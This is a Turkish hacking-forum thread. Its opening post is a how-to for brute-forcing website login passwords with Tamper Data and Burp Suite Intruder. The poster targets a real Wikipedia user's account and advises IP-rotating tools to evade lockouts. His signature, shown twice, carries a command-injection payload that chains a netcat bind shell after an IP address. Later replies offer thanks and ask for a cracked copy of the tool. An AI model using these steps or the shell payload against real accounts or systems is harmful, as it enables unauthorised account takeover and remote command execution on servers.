İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Burb Intruder ile kullanıcı şifrelerini kırın

05-02-2014 13:04
#1
db43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
root@db43
Mesajlar:
807
Teşekkür (Etti):
13
Teşekkür (Aldı):
114
Konular:
51
Ticaret:
(0) %
internetteki şifrelerin çoğunun güvensiz olduğunu biliyorsunuzdur.Peki bu şifreleri nasıl kıracağız , hangi tool bunun için uygundur?Benim gördüğüm araçlar arasından Burb Suite hem her işletim sisteminde çalışması açısından arayüzü olması açısından çok iyi bir araç.Web sitelerindeki şifreleri kırmak için bize gereken sadece :


https://addons.mozilla.org/en-US/fir...n/tamper-data/


Download Burp Suite

Not:Burb Suite Kali Linux'da öntanımlı olarak bulunmaktadır.

İlk olarak bu aracı nerelerde kullanabiliriz ona bakalım : admin panelleri , login panelleri , password resetleme formları gibi formlarda kullanabiliriz.
Ben size vereceğim örnekte vikipediada ********* reklamı yapan arkadaşlardan birinin kullanıcı adını aldım sadece şifreyi bulmak kaldı.
Kullanıcı adları çok açık bir şekilde forumlarda , sitelerde çok bariz açık bir şekilde bulunuyor.






Araçlar -> Temper Data'yı başlattıktan sonra Start Tamper diyoruz ve kullanıcı adını giriyoruz.Şifre yerine belirli bir kelime girin ki sonradan değişken olarak atayabilelim.

Formu gönderdikten sonra kutucuğu submit olarak işaretleyin ve programı durdurun.









Burb suite'i açın ve intruder kısmına gelin.






HTTPS ile bağlantı sağlıyorsanız işaretlemeyi unutmayın.






Şifreyi ekledikten sonra payload bölümüne geçiyoruz.






Bir tane değişken atadığım için 1'i seçtim eğer kullanıcı adını da değişken olarak atasaydım ikisi için ayrı ayrı seçecektim.Payload type'i username ayarladım bunu brute-force veya rekürsif de ayarlayabilirsiniz.






Not:
Program şifreleri denemeye başladı.

Not:Büyük ihtimalle bu saldırım sonuç vermeyecek çünkü genellikle basit olmayan sitelerde çok fazla istek gönderince ip adresi en azından bir süre için engellenir.Fakat bununla beraber kombine olarak kullanılabilecek devamlı ip adresi değiştiren programlar var.Gerekirse bunları kullanabilirsiniz.

Kullanıcı İmzası
Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
Konu db43 tarafından (06-02-2014 01:52 Saat 01:52 ) değiştirilmiştir.
eMSiBi, stewe Teşekkür etti.

05-02-2014 13:42
#2
Kloasy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
193
Teşekkür (Etti):
66
Teşekkür (Aldı):
10
Konular:
9
Ticaret:
(0) %
Teşekkürler de mesela benim şifrem 752258366 program bunu nasıl bulacak?
05-02-2014 14:11
#3
db43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
root@db43
Mesajlar:
807
Teşekkür (Etti):
13
Teşekkür (Aldı):
114
Konular:
51
Ticaret:
(0) %
Alıntı:
Kloasy´isimli üyeden Alıntı Mesajı göster
Teşekkürler de mesela benim şifrem 752258366 program bunu nasıl bulacak?
Programdaki payload seçenekleri(wordlist tipleri) var:
Bunların bir çoğunda şifren değişik sürelerde bulunacaktır.
Kullanıcı İmzası
Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
05-02-2014 14:41
#4
Kloasy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
193
Teşekkür (Etti):
66
Teşekkür (Aldı):
10
Konular:
9
Ticaret:
(0) %
Teşekkürler o zaman program için.
05-02-2014 14:46
#5
Kloasy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
193
Teşekkür (Etti):
66
Teşekkür (Aldı):
10
Konular:
9
Ticaret:
(0) %
Fullu var mıdır sende acaba ?
09-03-2015 16:49
#6
stewe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2014
Mesajlar:
157
Teşekkür (Etti):
228
Teşekkür (Aldı):
5
Konular:
23
Ticaret:
(0) %
guzel paylasım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı